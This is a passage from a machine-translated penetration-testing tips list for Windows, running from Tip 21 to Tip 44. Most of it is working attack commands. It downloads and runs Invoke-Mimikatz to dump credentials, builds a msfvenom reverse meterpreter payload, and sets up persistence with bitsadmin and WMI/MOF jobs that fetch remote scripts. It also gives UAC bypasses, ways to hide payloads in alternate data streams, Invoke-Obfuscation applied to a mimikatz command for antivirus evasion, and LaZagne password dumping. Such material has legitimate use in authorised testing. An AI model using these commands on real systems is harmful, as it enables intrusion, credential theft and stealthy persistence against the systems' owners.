It can be used to hide the payload in the shortcut, trick the user to click, and conceal the execution code. + +reference: + +["Infiltration Techniques - Parameter Hiding Techniques for Shortcut Files"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80 %E5%B7%A7-%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F%E6%96%87%E4%BB%B6%E7%9A%84% E5%8F%82%E6%95%B0%E9%9A%90%E8%97%8F%E6%8A%80%E5%B7%A7/) +--- + +### Tips 22. 32-bit programs can remotely inject 64-bit processes + +POC: + +https://github.com/3gstudent/CreateRemoteThread/blob/master/CreateRemoteThread32to64.cpp + +reference: + +["32-bit program for remote injection of 64-bit processes"] (https://3gstudent.github.io/3gstudent.github.io/32%E4%BD%8D%E7%A8%8B%E5%BA% 8F%E5%AF%B964%E4%BD%8D%E8%BF%9B%E7%A8%8B%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%B3%A8% E5%85%A5%E5%AE%9E%E7%8E%B0/) + +--- + +### Tips 23. The process of system permissions needs to be downgraded in some cases. + +Processes that use sytem permissions may encounter the following issues: + +1. Unable to get the current user's file content + +For example, the user's screen cannot be captured + +2. Environmental variables are different + +Therefore need to reduce the rights to the current user + +Demotion method 1: Use SelectMyParent.exe + +Code download address: https://github.com/3gstudent/From-System-authority-to-Medium-authority/blob/master/Processauthority.cpp + +reference: + +["Infiltration Skills - Procedure for Demotion Reduction"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5 %B7%A7-%E7%A8%8B%E5%BA%8F%E7%9A%84%E9%99%8D%E6%9D%83%E5%90%AF%E5%8A%A8/) + +Demotion method 2: use msdtc + +Using msdtc will load oci.dll with system privileges, but execute it in the admin privilege cmd: + +Msdtc -install + +Start calc.exe for high permission + +reference: + +[Use msdtc to maintain persistence] (https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/) + +--- + +### Tips 24. 
You can install WinPcap on Windows by command line, so you can use nmap and Masscan on Windows Springboard. + +reference: + +["Infiltration Techniques - Running Masscan and Nmap on Windows Platforms"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5%B7%A7-Windows%E5%B9%B3%E5%8F%B0%E8%BF%90%E8%A1%8CMasscan%E5%92%8CNmap/) + +--- + +### Tips 25. How to execute mimikatz on Windows platform + +#### Method 1: Via powershell + +``` +Powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" +``` + +#### Method 2: Via InstallUtil.exe + +``` +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe +``` + +reference: + +"Using Whitelists to Bypass 360 Instances" + +"More tests that use whitelists to bypass restrictions" + +#### Method 3: Via regsvr32.exe + +https://gist.githubusercontent.com/subTee/c3d5030bb99aa3f96bfa507c1c184504/raw/24dc0f93f1ebdda7c401dd3890259fa70d23f75b/regsvr32-katz.cs + +Encapsulate mimikatz into dll and run mimkatz via regsvr32 passed in parameters + +``` +Rundll32 katz.dll, EntryPoint log coffee exit +``` + +reference: + +Code Execution of Regsvr32.exe + +#### Method 4: Via msbuild.exe + +Download the xml file and save it as a.xml: + +Https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20mimikatz.xml + +Cmd: + +``` +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe executes a.xml +``` + +reference: + +["Use MSBuild To Do More"] (https://3gstudent.github.io/3gstudent.github.io/Use-MSBuild-To-Do-More/) + +#### Method 5: Passing csi.exe + +``` +"C:\Program Files (x86)\MSBuild\14.0\Bin\csi.exe" c:\test\katz.csx +``` + +reference: + +[Study Notes Weekly No. 
4 (Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes- Weekly-No.4 (Use-tracker-to-load-dll-&-Use-csi-to-bypass-UMCI-&-Execute-C-from-XSLT-file)/) + +#### Method 6: Passing the js/vbs script + +Https://gist.github.com/subTee/5c636b8736530fb20c3d + +https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f + +reference: + +["Using JS to load .Net programs"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8JS%E5%8A%A0%E8%BD% BD.Net%E7%A8%8B%E5%BA%8F/) + +--- + +### Tips 26. The location in the Windows system where you can store and read the payload. + +#### Method 1: WMI + +storage: + +``` +$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null, $null) +$StaticClass.Name = 'Win32_Command' +$StaticClass.Put() +$StaticClass.Properties.Add('Command' , $Payload) +$StaticClass.Put() +``` + +Read: + +``` +$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value +``` + +reference: + +"WMI Backdoor" + +#### Method 2: PE file containing digital signature + +Using the algorithm flaw of the file hash, hide the Payload from the PE file without affecting the digital signature of the PE file. + +reference: + +["Steganography - Hide Payload in Digital Certificates in PE Files"] (https://github.com/3gstudent/Pentest-and-Development-Tips/edit/master/README.md) + +#### Method 3: Special ADS + +(1)... 
+ +``` +Type putty.exe > ...:putty.exe +Wmic process call create c:\test\ads\...:putty.exe +``` + +(2) Special COM files + +``` +Type putty.exe > \\.\C:\test\ads\COM1:putty.exe +Wmic process call create \\.\C:\test\ads\COM1:putty.exe +``` + +(3) Disk root directory + +``` +Type putty.exe >C:\:putty.exe +Wmic process call create C:\:putty.exe +``` + +reference: + +["Advanced Advice for Hidden Alternative Data Streams"] (https://3gstudent.github.io/3gstudent.github.io/Hidden-Alternative-Data-Streams%E7%9A%84%E8%BF%9B% E9%98%B6%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7/) + +--- + +### Tips 27. Information worth collecting in Windows system + +#### (1) Registered WMI information + +``` +Wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET __RELPATH /FORMAT:list +Wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET __RELPATH /FORMAT:list +Wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding GET __RELPATH /FORMAT:list +``` + +The administrator may use WMI to record the attacker's call to WMI, which can be viewed by wmic. Of course, the monitoring function can be disabled by wmic. + +reference: + +[Study Notes Weekly No. 1 (Monitor WMI & Exports To C++ & Use DiskCleanup bypass UAC)]] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-Weekly-No.1 (Monitor -WMI_ExportsToC++_Use-DiskCleanup-bypass-UAC)/) + +--- + +### Tips 28. Common methods for Windows system bounce meterpreter + +#### Method 1: Loading dll rebound meterpreter via rundll32 + +Msf: + +``` +Msfvenom -p windows/meterpreter/reverse_http -f dll LHOST=192.168.174.133 LPORT=8080>./a.dll +``` + +Generate a.dll and upload it to the test host + +Execute `rundll32.exe a.dll, Control_RunDLL`, and go online. + +#### Method 2: Rebounding the meterpreter via cpl + +See https://raw.githubusercontent.com/3gstudent/test/master/meterpreter_reverse_tcp.cpp for the code. 
+ +Generate dll, rename it to cpl, double click to execute + +#### Method 3: Rebounding the meterpreter via powershell + +https://raw.githubusercontent.com/3gstudent/Code-Execution-and-Process-Injection/master/2-CodeExecution-Meterpreter.ps1 + +--- + +### Tips 29. How to load dll in Windows system + +#### Method 1: rundll32 + +``` +Rundll32 a.dll,EntryPoint +``` + +#### Method 2: regsvr32 + +``` +Regsvr32 a.dll +``` + +reference: + +Code Execution of Regsvr32.exe + +#### Method 3: odbcconf + +``` +Odbcconf.exe /a {regsvr c:\test\odbcconf.dll} +``` + +reference: + +[Study Notes Weekly No.3 (Use odbcconf to load dll & Get-Exports & ETW USB Keylogger)] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-Weekly-No. 3 (Use-odbcconf-to-load-dll-&-Get-Exports-&-ETW-USB-Keylogger)/) + +#### Method 4: Tracker + +``` +Tracker.exe /d test.dll /c svchost.exe +``` + +Tracker.exe contains Microsoft digital signatures that bypass the limitations of the application whitelist + +reference: + +[Study Notes Weekly No. 
4 (Use tracker to load dll & Use csi to bypass UMCI & Execute C# from XSLT file)] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes- Weekly-No.4 (Use-tracker-to-load-dll-&-Use-csi-to-bypass-UMCI-&-Execute-C-from-XSLT-file)/) + +#### Method 5: Excel.Application object's RegisterXLL() method + +Prerequisite: Microsoft Office software is installed + +1.rundll32 + +``` +rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\test\\messagebox.dll');this.close(); +``` + +2.js + +``` +var excel = new ActiveXObject("Excel.Application"); +excel.RegisterXLL("C:\\test\\messagebox.dll"); +``` + +3.powershell + +``` +$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application")) +$excel.RegisterXLL("C:\test\messagebox.dll") +``` + +reference: + +["Use Excel.Application object's RegisterXLL() method to load dll"](https://3gstudent.github.io/3gstudent.github.io/Use-Excel.Application-object's-RegisterXLL()-method-to-load -dll/) + +#### Method 6: xwizard.exe + +Copy xwizard.exe from %windir%\system32\ to the new directory C:\x + +Rename msg.dll to xwizards.dll and save it at C:\x + +Command line execution: + +``` +Xwizard processXMLFile 1.txt +``` + +Successfully loaded C:\x\xwizards.dll + +reference: + +["Use xwizard.exe to load dll"] (https://3gstudent.github.io/3gstudent.github.io/Use-xwizard.exe-to-load-dll/) + +--- + +### Tips 30. 
Windows Persistence + +#### Method 1: bitsadmin + +``` +Bitsadmin /create backdoor +Bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe +Bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll" +Bitsadmin /Resume backdoor +``` + +reference: + +"Use bitsadmin to maintain persistence and bypass Autoruns" + +#### Method 2: mof + +``` +Pragma namespace("\\\\.\\root\\subscription") +Instance of __EventFilter as $EventFilter +{ +    EventNamespace = "Root\\Cimv2"; +    Name = "filtP1"; +    Query = "Select * From __InstanceModificationEvent " +            "Where TargetInstance Isa \"Win32_LocalTime\" " +            "And TargetInstance.Second = 1"; +    QueryLanguage = "WQL"; +}; +Instance of ActiveScriptEventConsumer as $Consumer +{ +    Name = "consP1"; +    ScriptingEngine = "JScript"; +    ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")"; +}; +Instance of __FilterToConsumerBinding +{ +    Consumer = $Consumer; +    Filter = $EventFilter; +}; +``` + +Administrator privileges: + +``` +Mofcomp test.mof +``` + +reference: + +"WSC, JSRAT and WMI Backdoor" +  +#### Method 3: wmi + +Execute notepad.exe every 60 seconds + +``` +Wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" +Wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe" +Wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\"" +``` + +reference: + +[Study Notes of WMI Persistence using 
wmic.exe] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/) + +#### Method 4: Userland Persistence With Scheduled Tasks + +Hijack the scheduled task UserTask, load testmsg.dll at system startup + +The operation is as follows: + +Create a new item under HKEY_CURRENT_USER\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060} + +Then create a new item InprocServer32 + +The value is set to `c:\test\testmsg.dll` + +Testmsg.dll contains the following export functions: + +DllCanUnloadNow +DllGetClassObject +DllRegisterServer +DllUnregisterServer + +Waiting for users to log in again + +reference: + +["Userland registry hijacking"] (https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/) + +#### Method 5: Netsh + +The helper DLL needs to include the export function InitHelperDll + +Administrator privileges: + +``` +netsh add helper c:\test\netshtest.dll +``` + +After the helper dll is successfully added, c:\test\netshtest.dll will be loaded each time netsh is called. 
+ +reference: + +[Netsh persistence] (https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/) + +#### Method 6: Shim + +Common ways: + +- InjectDll +- RedirectShortcut +- RedirectEXE + +["Application Compatibility Shims in Penetration Testing"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF %95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims/) + +#### Method 7: dll hijacking + +Automatically enumerate processes through Rattler to detect the existence of available dll hijacking processes + +Path: + +- c:\windows\midimap.dll + +reference: + +["Ratler Test for DLL Hijacking Vulnerability Automated Identification Tool"] (https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6 %B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5 %8B%E8%AF%95/) + +#### Method 8: DoubleAgent + +Write a custom Verifier provider DLL + +Install via Application Verifier + +Inject into the target process to execute the payload + +Whenever the target process starts, it will execute payload, which is equivalent to a self-starting method. + +reference: + +["Application Verifier in Penetration Testing") (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B %E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)/) + +#### Method 9: waitfor.exe + +Self-starting is not supported, but can be activated remotely, and the background process is displayed as waitfor.exe + +reference: + +["Use Waitfor.exe to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/) + +#### Method 10: AppDomainManager + +For .Net programs, the .Do program can be hijacked by modifying the AppDomainManager. If you hijack the startup process of a system common .Net program such as powershell.exe and add a payload to it, you can implement a passive backdoor trigger mechanism. 
+ +reference: + +["Use AppDomainManager to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/) + +#### Method 11: Office Add-ins + +If the office software is already installed, you can implement hijacking by configuring the Office add-in as a passive backdoor. + +Commonly used methods: + +Word WLL + +Excel XLL + +Excel VBA add-ins + +PowerPoint VBA add-ins + +POC: https://github.com/3gstudent/Office-Persistence + +reference: + +["Use Office to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/) + +["Office Persistence on x64 operating system"] (https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/) + +#### Method 12: CLR + +Backdoor without administrator privileges and the ability to hijack all .Net programs + +POC: https://github.com/3gstudent/CLR-Injection + +reference: + +["Use CLR to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/) + +#### Method 13: msdtc + +Use the MSDTC service to load dlls, implement self-starting, and bypass Autoruns to detect startup items. 
+ +reference: + +[Use msdtc to maintain persistence] (https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/) + +#### Method 14: Hijack CAccPropServicesClass and MMDeviceEnumerator + +No need to reboot the system, no administrator privileges required + +Implemented by modifying the registry + +POC: https://github.com/3gstudent/COM-Object-hijacking + +reference: + +["Use COM Object hijacking to maintain persistence - Hijack CAccPropServicesClass and MMDeviceEnumerator"] (https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack- CAccPropServicesClass-and-MMDeviceEnumerator/) + +#### Method 15: Hijack explorer.exe + +No need to reboot the system, no administrator privileges required + +Implemented by modifying the registry + +reference: + +["Use COM Object hijacking to maintain persistence - Hijack explorer.exe"] (https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack- Explorer.exe/) + +#### Method 16: Windows FAX DLL Injection + +By DLL hijacking, hijacking Explorer.exe to load fxsst.dll + +Explorer.exe will load `c:\Windows\System32\fxsst.dll` at startup (service is enabled by default for fax service) + +Save the payload.dll in c:\Windows\fxsst.dll, which can implement dll hijacking, hijacking Explorer.exe to load fxsst.dll + +#### Method 17: Hijack specific features of Office software + +By dll hijacking, triggers backdoors when Office software performs certain functions + +reference: + +["Using BDF to implant backdoors into DLL files"] (https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6% 96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/) + +#### Method 18: Special Registry Keys + +The registry key creates a special name for the registry key, which the user normally cannot read (using the Win32 API), but the system can execute (using the Native API) + +reference: + +["Infiltration Technique - "Hidden" 
Creation of Registry"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80% E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B% E5%BB%BA/) + +["Infiltration Techniques - "Hide" More Tests in the Registry] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A %80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B %B4%E5%A4%9A%E6%B5%8B%E8%AF%95/) + +#### Method 19: Powershell Configuration File + +Modify the powershell configuration file, the backdoor is triggered after the powershell process starts. + +Check to see if you are using a configuration file: + +``` +Test-Path $profile +``` + +Create a configuration file: + +``` +New-Item -Path $profile -Type File –Force +``` + +Modify the contents of the configuration file and add a backdoor: + +``` +$string = 'Start-Process "cmd.exe"' +$string | Out-File -FilePath "C:\Users\a\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append +``` + +From: + +Https://rastamouse.me/2018/03/a-view-of-persistence/ + +#### Method 20: xml file + +reference: + +[https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4 %BB%B6%E7%9A%84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/"](https://3gstudent. Github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8wmic%E8%B0%83%E7%94%A8xsl%E6%96%87%E4%BB%B6%E7%9A %84%E5%88%86%E6%9E%90%E4%B8%8E%E5%88%A9%E7%94%A8/) + +--- + +### Tips 31. 
UAC bypass + +#### Method 1: use eventvwr.exe and registry hijacking + +Applicable: Win7, Win8.1, Win 10 + +https://github.com/3gstudent/UAC-Bypass/blob/master/Invoke-EventVwrBypass.ps1 + +reference: + +[Study Notes of WMI Persistence using wmic.exe] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/) + +["Userland registry hijacking"] (https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/) + +#### Method 2: use sdclt.exe + +For Win10 + +reference: + +[Study Notes of using sdclt.exe to bypass UAC] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-using-sdclt.exe-to-bypass-UAC/) + +#### Method 3: use SilentCleanup + +For Win8, Win10 + +``` +Reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM " +Schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I +``` + +reference: + +[Study Notes of using SilentCleanup to bypass UAC] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-using-SilentCleanup-to-bypass-UAC/) + +#### Method 4: use wscript.exe + +Only for Win7 + +https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1 + +reference: + +["Invoke-WScriptBypassUAC Utilization Analysis in Empire"] (https://3gstudent.github.io/3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9 %E7%94%A8%E5%88%86%E6%9E%90/) + +#### Method 5: use cmstp.exe + +Https://msitpros.com/?p=3960 + +Suitable for Win7 + +#### Method 5: Modify environment variables, hijack high-privilege .Net programs + +For Win7-Win10 + +Like gpedit.msc + +Modify the environment variables, use the CLR to hijack the boot process of gpedit.msc + +reference: + +["Use CLR to bypass UAC"] (https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-bypass-UAC/) + +#### Method 6: Modify the registry HKCU\Software\Classes\CLSID, hijack high-privilege program + +For Win7-Win10 + +- 
{B29D466A-857D-35BA-8712-A758861BFEA1} +- {D5AB5662-131D-453D-88C8-9BBA87502ADE} +- {0A29FF9E-7F9C-4437-8B11-F424491E3931} +- {CB2F6723-AB3A-11D2-9C40-00C04FA30A3E} + +reference: + +["Use CLR to bypass UAC"] (https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-bypass-UAC/) + +#### Method 7: Using COM Components + +Modify process information, spoof PSAPI, call COM component to implement unauthorized operation + +reference: + +["Transfering Files by COM Component IFileOperation"] (https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB %B6IFileOperation%E8%B6%8A%E6%9D%83%E5%A4%8D%E5%88%B6%E6%96%87%E4%BB%B6/) + +["NetFwPolicy2 over the right to close the firewall through the COM component"] (https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB %B6NetFwPolicy2%E8%B6%8A%E6%9D%83%E5%85%B3%E9%97%AD%E9%98%B2%E7%81%AB%E5%A2%99/) + +["Using the COM component IARPUninstallStringLauncher to bypass UAC"] (https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87COM%E7%BB%84%E4%BB %B6IARPUninstallStringLauncher%E7%BB%95%E8%BF%87UAC/) + +--- + +### Tips 32. Visual Studio generated exe or dll is used in other systems, prompting the lack of relevant DLL files + +Liberation method: + +Package the program for release + +Project Menu -> Project Properties, C / C + + -> Code Generation -> Run Library, select multi-threading (/MT) + +--- + +### Tips 33. Use LaZagne to export passwords stored in common applications in the current system. + +You can use LaZagne to export passwords stored in common applications in the current system (eg browser, Wifi, Git, Outlook, etc.) + +https://github.com/AlessandroZ/LaZagne + +Of course, you can also modify the LaZagne source code to implement password export for other applications. 
+ +reference: + +["Customized Script Development in LaZagne, a Local Password Viewing Tool"] (https://3gstudent.github.io/3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86 %E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5 %AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91/) + +--- + +### Tips 34. Using powershell to read and write files + +Read the text file: + +``` +$file = Get-Content "1.txt" +``` + +Write a text file: + +``` +Set-content "1.txt" +``` + +Read binary: + +``` +[System.IO.File]::ReadAllBytes('1.exe') +``` + +Write a binary file: + +``` +[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes) +``` + +--- + +### Tips 35. powershell for base64 encoding/decoding + +coding: + +``` +$encoded = [System.Convert]::ToBase64String($fileContent) +``` + +decoding: + +``` +$fileContent = [System.Convert]::FromBase64String($encoded) +``` +reference: + +[Study Notes of using BGInfo to bypass Application Whitelisting] (https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-using-BGInfo-to-bypass-Application-Whitelisting/) + +--- + +### Tips 36 If the powershell script is killed, try using Invoke-Obfuscation for confusion. + +https://github.com/danielbohannon/Invoke-Obfuscation + +Eg. + +Set the code to be confused: + +``` +Set scriptblock " Invoke-111111 -Command "log privilege::debug sekurlsa::logonpasswords exit" " +``` + +Enter `encoding` + +Enter `1` and specify the encoding as ascii + +Get confused code: + +``` +" $(SEt-iTem 'VARIaBle:OFS' '' ) "+ [StRinG](( 73,110 , 118 ,111, 107, 101, 45, 49, 49 ,49 ,49 ,49 , 49, 32 , 45 , 67 , 111, 109 , 109, 97 , 110 , 100 , 32 , 34 , 108 , 111 , 103 , 32 , 112 , 114 , 105 , 118 , 105 , 108 , 101 , 103 , 101 , 58 , 58 , 100 , 101 , 98 , 117 , 103 , 32 , 115,101,107,117,114,108,115, 97,58, 58, 108,111,103,111,110,112,97,115,115,119,111,114,100,115,32,101,120,105,116,34 )|FOReacH-objeCT{( [ ChAR][iNT] $_) } ) +"$( Set-variAbLE 'oFS' ' ' ) "|. 
( $env:PUbLic[13]+$eNv:PuBlIc[5]+'x') +``` + +--- + +### Tips 37 python script to exe + +Two common methods: + +- Use py2exe +- Use PyInstaller + +How to use and common bug fixes can refer to the reference link + +reference: + +["Customized Script Development in LaZagne, a Local Password Viewing Tool"] (https://3gstudent.github.io/3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86 %E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5 %AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91/) + +--- + +### Tips 38 Normal user rights write files to the path of administrator rights + +Eg. + +Release files to the `c:\windows` folder with normal user rights + +``` +Makecab c:\test\test.exe %TMP%\1.tmp +Wusa %TMP%\1.tmp /extract:"c:\windows" /quiet +``` + +Applicable to Win7, Win8, learning from: + +https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1 + +reference: + +["Invoke-WScriptBypassUAC Utilization Analysis in Empire"] (https://3gstudent.github.io/3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9 %E7%94%A8%E5%88%86%E6%9E%90/) + +--- + +### Tips 39 Summary of methods for executing programs on remote systems + +Common methods: + +- at +- psexec +- WMIC +- wmiexec +- smbexec +- powershell remoting + +Psexec usage: + +``` +Psexec.exe \\test.local /accepteula -u test\admin -p test123! -s -c test.bat +``` + +Test.bat is local + +new method: + +- DCOM + +reference: + +["Domain Penetration - Using DCOM to Execute Programs in Remote Systems"] (https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F -%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7% E8%A1%8C%E7%A8%8B%E5%BA%8F/) + +--- + +### Tips 40 Looking for services that can be utilized in Windows systems + +Enumerate the path of the executable file corresponding to the Windows system service. 
If the path contains the write permission of the normal user, the service can be used to increase the permission. + +Powershell code: + +``` +$ErrorActionPreference="SilentlyContinue" +$out = (Get-WmiObject win32_service | select PathName) +$out|% {[array]$global:path += $_.PathName} +For($i=0;$i -le $out.Count-1;$i++) +{ +    $a=Get-Acl -Path $out[$i].PathName.ToUpper().Substring($out[$i].PathName.ToUpper().IndexOfAny("C"),$out[$i]. PathName.ToUpper().LastIndexOfAny("\")) + If($a.Owner -ne "NT AUTHORITY\SYSTEM"){ +If($a.Owner -ne "NT SERVICE\TrustedInstaller"){ +If($a.Owner -ne "BUILTIN\Administrators"){ +Get-WmiObject win32_service | ?{$_.PathName -like $out[$i].PathName}|select Name,PathName,ProcessId,StartMode,State,Status +Write-host Owner: $a.Owner +} +} +    } +} +Write-host [+] All done. +``` + +reference: + +["Use powershell to find a writable windows service"] (https://3gstudent.github.io/3gstudent.github.io/Use-powershell-to-find-a-writable-windows-service/) + +--- + +### Tips 41 Using anti-virus software configuration errors to achieve self-starting and prioritizing anti-virus software execution + +Windows system supports Logon Scripts. Logon Scripts are executed at system startup. The execution order takes precedence over anti-virus software. Of course, anti-virus software cannot intercept the scripts in Logon Scripts (anti-virus software has not been started). + +The key is whether the anti-virus software will intercept the configuration of Logon Scripts. + +Add Logon Scripts with special operations, antivirus software will not intercept + +**Note:** + +The anti-virus software mentioned above refers to "partial" anti-virus software, which is not universal. + +reference: + +["Use Logon Scripts to maintain persistence"] (https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/) + +--- + +### Tips 42 Compiling c# program notes + +Use Visual Studio: + +The project name should correspond to the name specified by namespace. 
If it does not correspond, it can be modified in the project-attribute-assembly name. Otherwise, the generated dll cannot be used. + +Use csc.exe: + +Eg. + +``` +Using System; +Using System.Diagnostics; + +Namespace TestDotNet +{ +   Public class Class1 +   { +      Static Class1() +      { +         Process.Start("cmd.exe"); +         Environment.Exit(0); +      } +   } +} +``` +Save it as TestDotNet.cs and just use csc.exe to generate it: + +`C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library TestDotNet.cs` + +If saved as a.cs, ​​then you need to add /out parameter to specify the output file as TestDotNet.dll, so the assembly name is also defaulted to TestDotNet (corresponding to the same code), otherwise, although the dll can be loaded, but can not be executed, the parameters are as follows : + +`C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library /out:TestDotNet.dll a.cs` + +--- + +### Tips 43 Port problem with net use remote connection + +Use net use remote connection, if the target is enabled with NetBIOS over TCP/IP, then: + +1. The target opens both ports 139 and 445, and the system preferentially uses port 445. +2. Target disables port 445 and can connect using port 139 + +Target If NetBIOS over TCP/IP is disabled, then: + +1. Target disables port 445 and cannot connect + +--- + +### Tips 44 Get TrustedInstaller Permissions + +Start the service TrustedInstaller and get the TrustedInstaller permission through Token replication. + +Common methods: + +- SelectMyParent +- Invoke-TokenManipulation.ps1 +- incognito + +reference: + + [Infiltration Techniques - Token Stealing and Utilization] 